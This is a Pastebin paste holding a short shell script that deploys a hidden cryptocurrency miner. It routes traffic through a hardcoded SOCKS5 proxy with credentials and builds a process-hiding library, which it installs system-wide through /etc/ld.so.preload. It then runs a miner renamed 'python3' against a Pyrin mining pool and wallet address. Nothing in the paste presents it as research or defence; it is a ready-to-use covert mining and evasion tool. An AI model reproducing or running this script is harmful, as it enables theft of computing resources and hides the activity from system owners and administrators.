Advertisement
ppek

PYIcc LoL

Dec 15th, 2023 (edited)
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.24 KB | None | 0 0
  1. #!/bin/sh
  2. cd ~/
  3. echo " "
  4. echo " "
  5. echo " "
  6. echo "====================================="
  7. echo "Bismillahirahmannirrahim"
  8. echo "====================================="
  9. echo "dKs"
  10. echo " "
  11. echo " "
  12. echo " "
  13. sleep 2
  14. chmod +x ./d/graftcp/graftcp
  15. chmod +x ./d/graftcp/local/graftcp-local
  16. sleep 1
  17.  
  18. cat > d/graftcp/local/graftcp-local.conf <<END
  19. listen = :2233
  20. loglevel = 1
  21. socks5 = 47.236.129.76:443
  22. socks5_username = ali
  23. socks5_password = baba
  24. END
  25.  
  26. ./d/graftcp/local/graftcp-local -config d/graftcp/local/graftcp-local.conf &
  27.  
  28. sleep .2
  29.  
  30. echo " "
  31. echo ""
  32. ./d/graftcp/local/graftcp-local restart &
  33. echo ""
  34.  
  35. ./d/graftcp/graftcp curl ifconfig.me
  36.  
  37. echo " "
  38. echo " "
  39.  
  40. echo ""
  41.  
  42. echo " "
  43. echo " "
  44.  
  45. make
  46. gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
  47. mv libprocesshider.so /usr/local/lib/
  48. echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
  49. cd
  50. echo " "
  51. echo " "
  52. echo " "
  53. echo "====================================="
  54. echo "Bismillahirahmannirrahim"
  55. echo "====================================="
  56. echo "dKs"
  57. echo " "
  58. echo " "
  59.  
  60.  
  61. ./d/graftcp/graftcp ./python3 --algo PYRIN --pool 157.90.79.171:7777 --user pyrin:qqj77z33jjx6y54t83ptgp0r6gws30lf0xy2h8dzwcnhlhucj767vgw9d5e7s.PYI$(echo $(shuf -i 0-9 -n 1))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement